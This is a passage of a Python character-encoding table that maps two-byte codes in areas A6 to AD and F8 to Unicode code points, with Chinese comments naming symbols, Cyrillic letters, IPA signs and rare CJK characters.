0xA67A: 0x23293, # 𣊓
0xA67B: 0x3CA0, # 㲠
0xA67C: 0x2F922, # 牐
0xA67D: 0x24271, # 𤉱
0xA67E: 0x2720F, # 𧈏
0xA680: 0x00C1, # Á
0xA681: 0x0403, # Ѓ
0xA682: 0x00C9, # É
0xA683: 0x040C, # Ќ
0xA684: 0x00D3, # Ó
0xA685: 0x00FD, # ý
0xA686: 0xA686, # (Ы́)
0xA687: 0xA687, # (Э́)
0xA688: 0x04EC, # Ӭ
0xA689: 0xA689, # (Ю́)
0xA68A: 0xA68A, # (Я́)
0xA68B: 0xA68B, # (ѣ́)
0xA68C: 0xA68C, # (Ѣ́)
0xA68D: 0xA68D, # (И́)
0xA68E: 0x27E1B, # 𧸛
0xA68F: 0x910B, # 鄋
0xA690: 0x29F14, # 𩼔
0xA691: 0x2A0DF, # 𪃟
0xA692: 0x20270, # 𠉰
0xA693: 0x203F1, # 𠏱
0xA694: 0x211AB, # 𡆫
0xA695: 0x211E5, # 𡇥
0xA696: 0x21290, # 𡊐
0xA697: 0x363E, # 㘾
0xA698: 0x212DF, # 𡋟
0xA699: 0x57D7, # 埗
0xA69A: 0x2165F, # 𡙟
0xA69B: 0x248C2, # 𤣂
0xA69C: 0x22288, # 𢊈
0xA69D: 0x23C62, # 𣱢
0xA69E: 0x24276, # 𤉶
0xA69F: 0xFF1A, # 冒号 = :
0xA6A0: 0xFF1B, # 分号 = ;
0xA6B9: 0x2202, # 小写希腊字母 = ∂
0xA6BA: 0x03F5, # 小写希腊字母 = ϵ
0xA6BB: 0x03D1, # 小写希腊字母 = ϑ
0xA6BC: 0x03D5, # 小写希腊字母 = ϕ
0xA6BD: 0x03C6, # 小写希腊字母 = φ
0xA6BE: 0x03F0, # 小写希腊字母 = ϰ
0xA6BF: 0x03F1, # 小写希腊字母 = ϱ
0xA6C0: 0x03C2, # 小写希腊字母 = ς
0xA6D9: 0xFE10, # 竖排逗号 = ︐
0xA6DA: 0xFE12, # 竖排句号 = ︒
0xA6DB: 0xFE11, # 竖排顿号 = ︑
0xA6DC: 0xFE13, # 竖排冒号 = ︓
0xA6DD: 0xFE14, # 竖排分号 = ︔
0xA6DE: 0xFE15, # 竖排感叹号 = ︕
0xA6DF: 0xFE16, # 竖排问号 = ︖
0xA6EC: 0xFE17, # 竖排上空方圆括号 = ︗
0xA6ED: 0xFE18, # 竖排下空方圆括号 = ︘
0xA6F3: 0xFE19, # 竖排三点省略号 = ︙
0xA6F6: 0x00B7, # 居中间隔点 = ·
0xA6F7: 0xA6F7, # 居中逗号(middle ,)
0xA6F8: 0xA6F8, # 居中句号(middle 。)
0xA6F9: 0xA6F9, # 居中顿号(middle 、)
0xA6FA: 0xA6FA, # 居中冒号(middle :)
0xA6FB: 0xA6FB, # 居中分号(middle ;)
0xA6FC: 0xA6FC, # 居中感叹号(middle !)
0xA6FD: 0xA6FD, # 居中问号(middle ?)
0xA6FE: 0xA6FE # ( ͘)
})
# Area A7
_update({
0xA740: 0x24235, # 𤈵
0xA741: 0x2431A, # 𤌚
0xA742: 0x2489B, # 𤢛
0xA743: 0x4B63, # 䭣
0xA744: 0x25581, # 𥖁
0xA745: 0x25BB0, # 𥮰
0xA746: 0x7C06, # 簆
0xA747: 0x23388, # 𣎈
0xA748: 0x26A40, # 𦩀
0xA749: 0x26F16, # 𦼖
0xA74A: 0x2717F, # 𧅿
0xA74B: 0x22A98, # 𢪘
0xA74C: 0x3005, # 々
0xA74D: 0x22F7E, # 𢽾
0xA74E: 0x27BAA, # 𧮪
0xA74F: 0x20242, # 𠉂
0xA750: 0x23C5D, # 𣱝
0xA751: 0x22650, # 𢙐
0xA752: 0x247EF, # 𤟯
0xA753: 0x26221, # 𦈡
0xA754: 0x29A02, # 𩨂
0xA755: 0x45EA, # 䗪
0xA756: 0x26B4C, # 𦭌
0xA757: 0x26D9F, # 𦶟
0xA758: 0x26ED8, # 𦻘
0xA759: 0x359E, # 㖞
0xA75A: 0x20E01, # 𠸁
0xA75B: 0x20F90, # 𠾐
0xA75C: 0x3A18, # 㨘
0xA75D: 0x241A2, # 𤆢
0xA75E: 0x3B74, # 㭴
0xA75F: 0x43F2, # 䏲
0xA760: 0x40DA, # 䃚
0xA761: 0x3FA6, # 㾦
0xA762: 0x24ECA, # 𤻊
0xA763: 0x28C3E, # 𨰾
0xA764: 0x28C47, # 𨱇
0xA765: 0x28C4D, # 𨱍
0xA766: 0x28C4F, # 𨱏
0xA767: 0x28C4E, # 𨱎
0xA768: 0x28C54, # 𨱔
0xA769: 0x28C53, # 𨱓
0xA76A: 0x25128, # 𥄨
0xA76B: 0x251A7, # 𥆧
0xA76C: 0x45AC, # 䖬
0xA76D: 0x26A2D, # 𦨭
0xA76E: 0x41F2, # 䇲
0xA76F: 0x26393, # 𦎓
0xA770: 0x29F7C, # 𩽼
0xA771: 0x29F7E, # 𩽾
0xA772: 0x29F83, # 𩾃
0xA773: 0x29F87, # 𩾇
0xA774: 0x29F8C, # 𩾌
0xA775: 0x27785, # 𧞅
0xA776: 0x2775E, # 𧝞
0xA777: 0x28EE7, # 𨻧
0xA778: 0x290AF, # 𩂯
0xA779: 0x2070E, # 𠜎
0xA77A: 0x22AC1, # 𢫁
0xA77B: 0x20CED, # 𠳭
0xA77C: 0x3598, # 㖘
0xA77D: 0x220C7, # 𢃇
0xA77E: 0x22B43, # 𢭃
0xA780: 0x4367, # 䍧
0xA781: 0x20CD3, # 𠳓
0xA782: 0x20CAC, # 𠲬
0xA783: 0x36E2, # 㛢
0xA784: 0x35CE, # 㗎
0xA785: 0x3B39, # 㬹
0xA786: 0x44EA, # 䓪
0xA787: 0x20E96, # 𠺖
0xA788: 0x20E4C, # 𠹌
0xA789: 0x35ED, # 㗭
0xA78A: 0x20EF9, # 𠻹
0xA78B: 0x24319, # 𤌙
0xA78C: 0x267CC, # 𦟌
0xA78D: 0x28056, # 𨁖
0xA78E: 0x28840, # 𨡀
0xA78F: 0x20F90, # 𠾐
0xA790: 0x21014, # 𡀔
0xA791: 0x236DC, # 𣛜
0xA792: 0x28A17, # 𨨗
0xA793: 0x28879, # 𨡹
0xA794: 0x4C9E, # 䲞
0xA795: 0x20410, # 𠐐
0xA796: 0x40DF, # 䃟
0xA797: 0x210BF, # 𡂿
0xA798: 0x22E0B, # 𢸋
0xA799: 0x4312, # 䌒
0xA79A: 0x233AB, # 𣎫
0xA79B: 0x2812E, # 𨄮
0xA79C: 0x4A31, # 䨱
0xA79D: 0x27B48, # 𧭈
0xA79E: 0x29EAC, # 𩺬
0xA79F: 0x23822, # 𣠢
0xA7A0: 0x244CB, # 𤓋
0xA7C2: 0x0409, # 大写俄文字母LJE = Љ
0xA7C3: 0x040A, # 大写俄文字母NJE = Њ
0xA7C4: 0x040F, # 大写俄文字母DZHE = Џ
0xA7C5: 0x04AE, # 大写俄文字母 = Ү
0xA7C6: 0x0402, # 俄文字母 = Ђ
0xA7C7: 0x040B, # 俄文字母 = Ћ
0xA7C8: 0x0474, # 俄文字母 = Ѵ
0xA7C9: 0x0462, # 俄文字母 = Ѣ
0xA7CA: 0x0463, # 俄文字母 = ѣ
0xA7CB: 0x04E8, # 俄文字母 = Ө
0xA7CC: 0x0459, # 俄文字母 = љ
0xA7CD: 0x045A, # 俄文字母 = њ
0xA7CE: 0x045F, # 俄文字母 = џ
0xA7CF: 0x04AF, # 俄文字母 = ү
0xA7F2: 0x00E1, # 俄文字母 = á
0xA7F3: 0x00E9, # 俄文字母 = é
0xA7F4: 0xA7F4, # 俄文字母(и́)
0xA7F5: 0x00F3, # 俄文字母 = ó
0xA7F6: 0x00FD, # 俄文字母 = ý
0xA7F7: 0xA7F7, # 俄文字母(ы́)
0xA7F8: 0xA7F8, # 俄文字母(э́)
0xA7F9: 0xA7F9, # 俄文字母(ю́)
0xA7FA: 0xA7FA, # 俄文字母(я́)
0xA7FB: 0x0452, # 俄文字母 = ђ
0xA7FC: 0x045B, # 俄文字母 = ћ
0xA7FD: 0x0475, # 俄文字母 = ѵ
0xA7FE: 0x04E9 # 俄文字母 = ө
})
# Area A8
_update({
0xA8BC: 0x1E3F, # 汉语拼音(ḿ) = ḿ
0xA8C1: 0xA8C1, # 中文阴圈码十(⏺ + 十)
0xA8C2: 0xA8C2, # 中文阴圈码廿(⏺ + 廿)
0xA8C3: 0xA8C3, # 中文阴圈码卅(⏺ + 卅)
0xA8C4: 0x4E00, # 注音符号— = 一
0xA8EA: 0xA8EA, # 中文阴框码一(⏹ + 一)
0xA8EB: 0xA8EB, # 中文阴框码二(⏹ + 二)
0xA8EC: 0xA8EC, # 中文阴框码三(⏹ + 三)
0xA8ED: 0xA8ED, # 中文阴框码四(⏹ + 四)
0xA8EE: 0xA8EE, # 中文阴框码五(⏹ + 五)
0xA8EF: 0xA8EF, # 中文阴框码六(⏹ + 六)
0xA8F0: 0xA8F0, # 中文阴框码七(⏹ + 七)
0xA8F1: 0xA8F1, # 中文阴框码八(⏹ + 八)
0xA8F2: 0xA8F2, # 中文阴框码九(⏹ + 九)
0xA8F3: 0xA8F3, # 中文阴框码十(⏹ + 十)
0xA8F4: 0xA8F4, # 中文阴框码廿(⏹ + 廿)
0xA8F5: 0xA8F5, # 中文阴框码卅(⏹ + 卅)
0xA8F6: 0xA8F6, # 中文阴圈码一(⏺ + 一)
0xA8F7: 0xA8F7, # 中文阴圈码二(⏺ + 二)
0xA8F8: 0xA8F8, # 中文阴圈码三(⏺ + 三)
0xA8F9: 0xA8F9, # 中文阴圈码四(⏺ + 四)
0xA8FA: 0xA8FA, # 中文阴圈码五(⏺ + 五)
0xA8FB: 0xA8FB, # 中文阴圈码六(⏺ + 六)
0xA8FC: 0xA8FC, # 中文阴圈码七(⏺ + 七)
0xA8FD: 0xA8FD, # 中文阴圈码八(⏺ + 八)
0xA8FE: 0xA8FE # 中文阴圈码九(⏺ + 九)
})
# Area A9
_update({
0xA9A1: 0xA9A1, # (╪)
0xA9A2: 0xA9A2, # (╡)
0xA9F0: 0x21E8, # 空心向右箭头 = ⇨
0xA9F1: 0x21E6, # 空心向左箭头 = ⇦
0xA9F2: 0x2B06, # 实心向上箭头 = ⬆
0xA9F3: 0x2B07, # 实心向下箭头 = ⬇
0xA9F4: 0x27A1, # 实心向右箭头 = ➡
0xA9F5: 0x2B05, # 实心向左箭头 = ⬅
0xA9F6: 0x2B62, # 箭头-无翅向右 = ⭢
0xA9F7: 0x2B60, # 箭头-无翅向左 = ⭠
0xA9F8: 0x2B61, # 箭头-无翅向左 = ⭡
0xA9F9: 0x2B63, # 箭头-无翅向左 = ⭣
0xA9FA: 0x21C1, # 箭头-下单翅向右 = ⇁
0xA9FB: 0x21BD, # 箭头-下单翅向左 = ↽
0xA9FC: 0xA9FC, # 箭头-双向向内(ꜜ͎)
0xA9FD: 0x2195, # 箭头-双向向外 = ↕
0xA9FE: 0x2B65, # 箭头-无翅双向向外 = ⭥
})
# Area AA
_update({
0xAAA1: 0xAAA1, # BD语言注解:盘外符开弧(⸨)
0xAAA2: 0xAAA2, # BD语言注解:盘外符标记()→)
0xAAA3: 0xAAA3, # BD语言注解:盘外符闭弧(⸩)
0xAAA4: 0xAAA4, # BD语言注解:换行符(⇙)
0xAAA5: 0xAAA5, # BD语言注解:换段符(↙)
0xAAA6: 0xAAA6, # BD语言注解:小样文件结束(Ω)
0xAAA7: 0xAAA7, # BD语言注解:数学态标记(◯ + ﹩)
0xAAA8: 0xAAA8, # BD语言注解:自定义参数(◯ + ﹠)
0xAAA9: 0xAAA9, # BD语言注解:盒子开弧(⦃)
0xAAAA: 0xAAAA, # BD语言注解:盒子闭弧(⦄)
0xAAAB: 0xAAAB, # BD语言注解:转字体标记(ⓩ)
0xAAAC: 0xAAAC, # BD语言注解:上标(⤊)
0xAAAD: 0xAAAD, # BD语言注解:下标(⤋)
0xAAB0: 0x002C, # 千分撇 = ,
0xAAB1: 0x002E, # 小数点 = .
0xAAB2: 0x2010, # 半字线 = ‒
0xAAB3: 0x002A, # 六角星号、呼应号 = *
0xAAB4: 0x0021, # 阶乘 = !
0xAAB5: 0x2202, # 偏导数 = ∂
0xAAB6: 0x2211, # 和 = ∑
0xAAB7: 0x220F, # 积 = ∏
0xAAB8: 0x2AEE, # 非因子号 = ⫮
0xAAB9: 0x2031, # 万分号 = ‱
0xAABA: 0x227B, # 前继 = ≻
0xAABB: 0x227A, # 后继 = ≺
0xAABC: 0x2282, # 包含于 = ⊂
0xAABD: 0x2283, # 包含 = ⊃
0xAABE: 0x225C, # Delta等于 = ≜
0xAABF: 0x00AC, # 否定 = ¬
0xAAC0: 0x22CD, # ⋍
0xAAC1: 0x2286, # 包含于 = ⊆
0xAAC2: 0x2287, # 包含 = ⊇
0xAAC3: 0x225C, # ≜
0xAAC4: 0x2243, # 近似符号 = ⋍
0xAAC5: 0x2265, # 大于等于 = ≥
0xAAC6: 0x2264, # 小于等于 = ≤
0xAAC7: 0x2214, # 穆勒连分符号、集合合 = ∔
0xAAC8: 0x2238, # 算术差 = ∸
0xAAC9: 0x2A30, # 直积号 = ⨰
0xAACA: 0x2271, # 不大于等于 = ≱
0xAACB: 0x2270, # 不小于等于 = ≰
0xAACC: 0x2AB0, # ⪰
0xAACD: 0x2AAF, # ⪯
0xAACE: 0x5350, # 卐
0xAACF: 0x212A, # 绝对温度单位 = K
0xAAD0: 0x2200, # 全称量词 = ∀
0xAAD1: 0x21D1, # ⇑
0xAAD2: 0x21E7, # ⇧
0xAAD3: 0x21BE, # ↾
0xAAD4: 0x21D3, # ⇓
0xAAD5: 0x21E9, # ⇩
0xAAD6: 0x21C3, # ⇃
0xAAD7: 0x2935, # ⤵
0xAAD8: 0x21E5, # ⇥
0xAAD9: 0x22F0, # 对角三连点 = ⋰
0xAADA: 0x21D4, # 等价 = ⇔
0xAADB: 0x21C6, # ⇆
0xAADC: 0x2194, # ↔
0xAADD: 0x21D2, # 推断 = ⇒
0xAADE: 0x21E8, # ⇨
0xAADF: 0x21C0, # ⇀
0xAAE0: 0x27F6, # ⟶
0xAAE1: 0x21D0, # ⇐
0xAAE2: 0x21E6, # ⇦
0xAAE3: 0x21BC, # ↼
0xAAE4: 0x27F5, # ⟵
0xAAE5: 0x2196, # ↖️
0xAAE6: 0x2199, # ↙️
0xAAE7: 0x2198, # ↘️
0xAAE8: 0x2197, # ↗️
0xAAE9: 0x22D5, # 平行等于 = ⋕
0xAAEA: 0x2AC5, # 包含于 = ⫅
0xAAEB: 0x2AC6, # 包含 = ⫆
0xAAEC: 0x29CB, # 相当于 = ⧋
0xAAED: 0x226B, # 远大于 = ≫
0xAAEE: 0x226A, # 远小于 = ≪
0xAAEF: 0x2A72, # 加或等于 = ⩲
0xAAF0: 0x22BB, # ⊻
0xAAF1: 0x2AE8, # 垂直等于 = ⫨
0xAAF2: 0x2277, # 大于或小于 = ≷
0xAAF3: 0x227D, # ≽
0xAAF4: 0x227C, # ≼
0xAAF5: 0x2109, # 华氏度 = ℉
0xAAF6: 0x2203, # 存在量词 = ∃
0xAAF7: 0x22F1, # 对角三连点 = ⋱
0xAAF9: 0x2241, # ≁
0xAAFA: 0x2244, # ≄
0xAAFB: 0x2276, # ≶
0xAAFC: 0x2209, # 不属于 = ∉
0xAAFD: 0x2267, # ≧
0xAAFE: 0x2266 # ≦
})
# Area AB
_update({
0xABA1: 0x224B, # ≋
0xABA2: 0x2262, # 不恒等于 = ≢
0xABA3: 0x2251, # 近似值号 = ≑
0xABA4: 0x2284, # 不包含于 = ⊄
0xABA5: 0x2285, # 不包含 = ⊅
0xABA6: 0x2259, # 相当于、等角的、估算 = ≙
0xABA7: 0x2205, # 空集 = ∅
0xABA8: 0x2207, # 微分算符 = ∇
0xABA9: 0x2A01, # 直和 = ⨁
0xABAA: 0x2A02, # 重积 = ⨂
0xABAB: 0x03F9, # 组合 = Ϲ
0xABAC: 0xABAC, # 对角六连点(⋰ + ⋰)
0xABAD: 0x263C, # ☼
0xABAE: 0xABAE, # (⚬ + ↑)
0xABAF: 0x2247, # 不近似等于 = ≇
0xABB0: 0x2249, # 不近似等于 = ≉
0xABB1: 0x2278, # 不小于大于 = ≸
0xABB2: 0x22F6, # 不属于 = ⋶
0xABB3: 0x2AFA, # 大于等于 = ⫺
0xABB4: 0x2AF9, # 小于等于 = ⫹
0xABB5: 0x2245, # 近似等于、接近 = ≅
0xABB6: 0x2267, # 大于等于 = ≧
0xABB7: 0x2250, # 近似等于 = ≐
0xABB8: 0x2266, # 小于等于 = ≦
0xABB9: 0x2A26, # 加或差 = ⨦
0xABBA: 0x2213, # 负或正、减或加 = ∓
0xABBB: 0x233F, # ⌿
0xABBC: 0x30FC, # 日文符号 = ー
0xABBD: 0xABBD, # 近似值号(· + ≈)
0xABBE: 0x2288, # 不包含于 = ⊈
0xABBF: 0x2289, # 不包含 = ⊉
0xABC0: 0x225A, # 角相等 = ≚
0xABC1: 0x2205, # 空集 = ∅
0xABC2: 0x2205, # (diagonal 卐)
0xABC3: 0x0024, # $
0xABC4: 0x2709, # ✉
0xABC5: 0x272E, # ✮
0xABC6: 0x272F, # ✯
0xABC7: 0x2744, # ❄
0xABC8: 0x211E, # 处方符号 = ℞
0xABC9: 0x1D110, # 𝄐
0xABCA: 0x2034, # 三次微分 = ‴
0xABCB: 0xABCB, # 对角六连点(⋱ + ⋱)
0xABCC: 0x2ACB, # 真包含于 = ⫋
0xABCD: 0x2ACC, # 真包含 = ⫌
0xABCE: 0x2A63, # ⩣
0xABCF: 0xABCF, # 约数0(0 + \)
0xABD0: 0xABD0, # 约数1(1 + \)
0xABD1: 0xABD1, # 约数2(2 + \)
0xABD2: 0xABD2, # 约数3(3 + \)
0xABD3: 0xABD3, # 约数4(4 + \)
0xABD4: 0xABD4, # 约数5(5 + \)
0xABD5: 0xABD5, # 约数6(6 + \)
0xABD6: 0xABD6, # 约数7(7 + \)
0xABD7: 0xABD7, # 约数8(8 + \)
0xABD8: 0xABD8, # 约数9(9 + \)
0xABD9: 0x216C, # 罗马数字50 = Ⅼ
0xABDA: 0x216D, # 罗马数字100 = Ⅽ
0xABDB: 0x216E, # 罗马数字500 = Ⅾ
0xABDC: 0x216F, # 罗马数字1000 = Ⅿ
0xABDD: 0x2295, # 圈加 = ⊕
0xABDE: 0xABDE, # 圈加减(◯ + ±)
0xABDF: 0x2296, # 圈减 = ⊖
0xABE0: 0xABE0, # 圈点减(◯ + ∸)
0xABE1: 0x2297, # 圈乘 = ⊗
0xABE2: 0x2A38, # 圈除 = ⨸
0xABE3: 0x229C, # 圈等于 = ⊜
0xABE4: 0xABE4, # 交流电机(◯ + ∼)
0xABE5: 0xABE5, # 圈大于等于(◯ + ≥)
0xABE6: 0xABE6, # 圈小于等于(◯ + ≤)
0xABE7: 0x224A, # 近似等于 = ≊
0xABE8: 0xABE8, # (> + >)
0xABE9: 0xABE9, # (< + <)
0xABEA: 0x22DB, # 大于等于小于 = ⋛
0xABEB: 0x22DA, # 小于等于大于 = ⋚
0xABEC: 0x2A8C, # 大于等于小于 = ⪌
0xABED: 0x2A8B, # 小于等于大于 = ⪋
0xABEE: 0x2273, # ≳
0xABEF: 0x2272, # ≲
0xABF0: 0x29A5, # ⦥
0xABF1: 0x29A4, # ⦤
0xABF2: 0x2660, # 黑桃 = ♠
0xABF3: 0x2394, # 正六边形 = ⎔
0xABF4: 0x2B20, # 正五边形 = ⬠
0xABF5: 0x23E2, # 梯形 = ⏢
0xABF6: 0x2663, # 梅花 = ♣
0xABF7: 0x25B1, # 平行四边形 = ▱
0xABF8: 0x25AD, # 矩形 = ▭
0xABF9: 0x25AF, # 矩形 = ▯
0xABFA: 0x2665, # 红桃 = ♥
0xABFB: 0x2666, # 方块 = ♦
0xABFC: 0x25C1, # 三角形(向左) = ◁
0xABFD: 0x25BD, # 三角形(向下) = ▽
0xABFE: 0x25BD # 三角形(向右) = ▷
})
# Area AC
_update({
0xACA1: 0x25C0, # 实三角形(向左) = ◀
0xACA2: 0x25BC, # 实三角形(向下) = ▼
0xACA3: 0x25B6, # 实三角形(向右) = ▶
0xACA4: 0x25FA, # 直角三角形 = ◺
0xACA5: 0x22BF, # 直角三角形 = ⊿
0xACA6: 0x25B3, # △
0xACA7: 0x27C1, # ⟁
0xACA8: 0x2BCE, # ⯎
0xACA9: 0x2B2F, # ⬯
0xACAA: 0xACAA, # (⬯ + ∥)
0xACAB: 0x2B2E, # ⬮
0xACAC: 0x2279, # 不大于小于 = ≹
0xACAD: 0x1D10B, # 𝄋
0xACAE: 0x2218, # 圈乘 = ∘
0xACAF: 0xACAF, # (vertical ≈)
0xACB2: 0xACB2, # (F-like symbol)
0xACB3: 0x22A6, # ⊦
0xACB4: 0x22A7, # ⊧
0xACB5: 0x22A8, # ⊨
0xACB6: 0x29FA, # 强阳二值 = ⧺
0xACB7: 0x29FB, # 强阳三值 = ⧻
0xACB8: 0xACB8, # 强阳四值(++++)
0xACB9: 0x291A, # ⤚
0xACBA: 0xACBA, # (⤙ + _)
0xACBB: 0xACBB, # (⤚ + _)
0xACBC: 0x2713, # 勾 = ✓
0xACBD: 0x22CE, # ⋎
0xACBE: 0xACBE, # (V + \)
0xACBF: 0xACBF, # (ˇ + | + ꞈ)
0xACC0: 0x224E, # 相当于、等值于 = ≎
0xACC1: 0x224F, # 间差 = ≏
0xACC2: 0x23D3, # ⏓
0xACC3: 0xACC3, # (◡ + _)
0xACC4: 0xACC4, # (◡ + _ + /)
0xACC5: 0x2715, # ✕
0xACC6: 0xACC6, # (✕ + •)
0xACC8: 0xACC8, # (∩ + ˜)
0xACC9: 0xACC9, # (∪ + ˜)
0xACCA: 0xACCA, # (V̰)
0xACCB: 0xACCB, # (V̱)
0xACCC: 0xACCC, # (V̱̰)
0xACCD: 0x2126, # Ω
0xACCE: 0x221D, # 成正比 = ∝
0xACCF: 0x29A0, # 角 = ⦠
0xACD0: 0x2222, # 角 = ∢
0xACD1: 0x2AAC, # 小于等于 = ⪬
0xACD2: 0x2239, # 差 = ∹
0xACD3: 0x223A, # ∺
0xACD4: 0x2135, # ℵ
0xACD5: 0xACD5, # (⊃ + ᐣ)
0xACD6: 0xACD6, # (⊃ + ᐣ + /)
0xACD7: 0x21CC, # ⇌
0xACD8: 0x274B, # ❋
0xACD9: 0x2B01, # ⬁
0xACDA: 0x2B03, # ⬃
0xACDB: 0x2B02, # ⬂
0xACDC: 0x2B00, # ⬀
0xACDD: 0xACDD, # (△ + ▾)
0xACDE: 0xACDE, # (▲ + ▿)
0xACDF: 0xACDE, # (( + —)
0xACE0: 0xACE0, # ([ + —)
0xACE1: 0xACE1, # ([ + —)
0xACE2: 0xACE2, # () + —)
0xACE3: 0xACE3, # (] + —)
0xACE4: 0xACE4, # (] + —)
0xACE5: 0xACE5, # (] + — + ₙ)
0xACE6: 0xACE6, # (] + — + ₘ)
0xACE7: 0xACE7, # (] + — + ₓ)
0xACE8: 0xACE8, # () + — + ₙ)
0xACE9: 0x2233, # 逆时针环积分 = ∳
0xACEA: 0x2232, # 顺时针环积分 = ∲
0xACEB: 0x222C, # 二重积分 = ∬
0xACEC: 0x222F, # 二重环积分 = ∯
0xACED: 0x222D, # 三重积分 = ∭
0xACEE: 0x2230, # 三重环积分 = ∰
0xACEF: 0x0421, # 组合符号 = С
0xACF0: 0x2019, # 所有格符 = ’
0xACF1: 0x0027, # 重音节符号 = '
0xACF2: 0x03A3, # 和(正文态) = Σ
0xACF3: 0x03A0, # 积(正文态) = Π
0xACF4: 0x02C7, # 注音符号 = ˇ
0xACF5: 0x02CB, # 注音符号 = ˋ
0xACF6: 0x02CA, # 注音符号 = ˊ
0xACF7: 0x02D9, # 注音符号 = ˙
0xACF8: 0x29F72, # 𩽲
0xACF9: 0x362D, # 㘭
0xACFA: 0x3A52, # 㩒
0xACFB: 0x3E74, # 㹴
0xACFC: 0x27741, # 𧝁
0xACFD: 0x30FC, # 日文长音记号 = ー
0xACFE: 0x2022 # 注音符号 = •
})
# Area AD
_update({
0xADA1: 0x3280, # 中文阳圈码一 = ㊀
0xADA2: 0x3281, # 中文阳圈码二 = ㊁
0xADA3: 0x3282, # 中文阳圈码三 = ㊂
0xADA4: 0x3283, # 中文阳圈码四 = ㊃
0xADA5: 0x3284, # 中文阳圈码五 = ㊄
0xADA6: 0x3285, # 中文阳圈码六 = ㊅
0xADA7: 0x3286, # 中文阳圈码七 = ㊆
0xADA8: 0x3287, # 中文阳圈码八 = ㊇
0xADA9: 0x3288, # 中文阳圈码九 = ㊈
0xADAA: 0xADAA, # 中文阳圈码一零(◯ + 一〇)
0xADAB: 0xADAB, # 中文阳圈码一一(◯ + 一一)
0xADAC: 0xADAC, # 中文阳圈码一二(◯ + 一二)
0xADAD: 0xADAD, # 中文阳圈码一三(◯ + 一三)
0xADAE: 0xADAE, # 中文阳圈码一四(◯ + 一四)
0xADAF: 0xADAF, # 中文阳圈码一五(◯ + 一五)
0xADB0: 0xADB0, # 中文阳圈码一六(◯ + 一六)
0xADB1: 0xADB1, # 中文阳圈码一七(◯ + 一七)
0xADB2: 0xADB2, # 中文阳圈码一八(◯ + 一八)
0xADB3: 0xADB3, # 中文阳圈码一九(◯ + 一九)
0xADB4: 0xADB4, # 中文阳圈码二零(◯ + 二〇)
0xADB5: 0x24EA, # 数字阳圈码0 = ⓪
0xADB6: 0x2018, # 外文左单引号 = ‘
0xADB7: 0x201C, # 外文左双引号 = “
0xADB8: 0x2019, # 外文右单引号 = ’
0xADB9: 0x201D, # 外文右双引号 = ”
0xADBA: 0x025B, # 国际音标 = ɛ
0xADBB: 0x0251, # 国际音标 = ɑ
0xADBC: 0x0259, # 国际音标 = ə
0xADBD: 0x025A, # 国际音标 = ɚ
0xADBE: 0x028C, # 国际音标 = ʌ
0xADBF: 0x0254, # 国际音标 = ɔ
0xADC0: 0x0283, # 国际音标 = ʃ
0xADC1: 0x02D1, # 国际音标 = ˑ
0xADC2: 0x02D0, # 国际音标 = ː
0xADC3: 0x0292, # 国际音标 = ʒ
0xADC4: 0x0261, # 国际音标 = ɡ
0xADC5: 0x03B8, # 国际音标 = θ
0xADC6: 0x00F0, # 国际音标 = ð
0xADC7: 0x014B, # 国际音标 = ŋ
0xADC8: 0x0264, # 国际音标 = ɤ
0xADC9: 0x0258, # 国际音标 = ɘ
0xADCA: 0x026A, # 国际音标 = ɪ
0xADCB: 0x0268, # 国际音标 = ɨ
0xADCC: 0x027F, # 国际音标 = ɿ
0xADCD: 0x0285, # 国际音标 = ʅ
0xADCE: 0x028A, # 国际音标 = ʊ
0xADCF: 0x00F8, # 国际音标 = ø
0xADD0: 0x0275, # 国际音标 = ɵ
0xADD1: 0x026F, # 国际音标 = ɯ
0xADD2: 0x028F, # 国际音标 = ʏ
0xADD3: 0x0265, # 国际音标 = ɥ
0xADD4: 0x0289, # 国际音标 = ʉ
0xADD5: 0x0278, # 国际音标 = ɸ
0xADD6: 0x0288, # 国际音标 = ʈ
0xADD7: 0x0290, # 国际音标 = ʐ
0xADD8: 0x0256, # 国际音标 = ɖ
0xADD9: 0x0282, # 国际音标 = ʂ
0xADDA: 0x0272, # 国际音标 = ɲ
0xADDB: 0x0271, # 国际音标 = ɱ
0xADDC: 0x03B3, # 国际音标 = γ
0xADDD: 0x0221, # 国际音标 = ȡ
0xADDE: 0x0255, # 国际音标 = ɕ
0xADDF: 0x0235, # 国际音标 = ȵ
0xADE0: 0x0291, # 国际音标 = ʑ
0xADE1: 0x0236, # 国际音标 = ȶ
0xADE2: 0x026C, # 国际音标 = ɬ
0xADE3: 0x028E, # 国际音标 = ʎ
0xADE4: 0x1D84, # 国际音标 = ᶄ
0xADE5: 0xAB53, # 国际音标 = ꭓ
0xADE6: 0x0127, # 国际音标 = ħ
0xADE7: 0x0263, # 国际音标 = ɣ
0xADE8: 0x0281, # 国际音标 = ʁ
0xADE9: 0x0294, # 国际音标 = ʔ
0xADEA: 0x0295, # 国际音标 = ʕ
0xADEB: 0x0262, # 国际音标 = ɢ
0xADEC: 0x0266, # 国际音标 = ɦ
0xADED: 0x4C7D, # 䱽
0xADEE: 0x24B6D, # 𤭭
0xADEF: 0x00B8, # 新蒙文 = ¸
0xADF0: 0x02DB, # 新蒙文 = ˛
0xADF1: 0x04D8, # 新蒙文 = Ә
0xADF2: 0x04BA, # 新蒙文 = Һ
0xADF3: 0x0496, # 新蒙文 = Җ
0xADF4: 0x04A2, # 新蒙文 = Ң
0xADF5: 0x2107B, # 𡁻
0xADF6: 0x2B62C, # 𫘬
0xADF7: 0x04D9, # 新蒙文 = ә
0xADF8: 0x04BB, # 新蒙文 = һ
0xADF9: 0x0497, # 新蒙文 = җ
0xADFA: 0x04A3, # 新蒙文 = ң
0xADFB: 0x40CE, # 䃎
0xADFC: 0x04AF, # 新蒙文 = ү
0xADFD: 0x02CC, # 次重音符号 = ˌ
0xADFE: 0xff40 # 次重音符号 = `
})
# Area F8
_update({
0xF8A1: 0x5C2A, # 尪
0xF8A2: 0x97E8, # 韨
0xF8A3: 0x5F67, # 彧
0xF8A4: 0x672E, # 朮
0xF8A5: 0x4EB6, # 亶
0xF8A6: 0x53C6, # 叆
0xF8A7: 0x53C7, # 叇
0xF8A8: 0x8BBB, # 讻
0xF8A9: 0x27BAA, # 𧮪
0xF8AA: 0x8BEA, # 诪
0xF8AB: 0x8C09, # 谉
0xF8AC: 0x8C1E, # 谞
0xF8AD: 0x5396, # 厖
0xF8AE: 0x9EE1, # 黡
0xF8AF: 0x533D, # 匽
0xF8B0: 0x5232, # 刲
0xF8B1: 0x6706, # 朆
0xF8B2: 0x50F0, # 僰
0xF8B3: 0x4F3B, # 伻
0xF8B4: 0x20242, # 𠉂
0xF8B5: 0x5092, # 傒
0xF8B6: 0x5072, # 偲
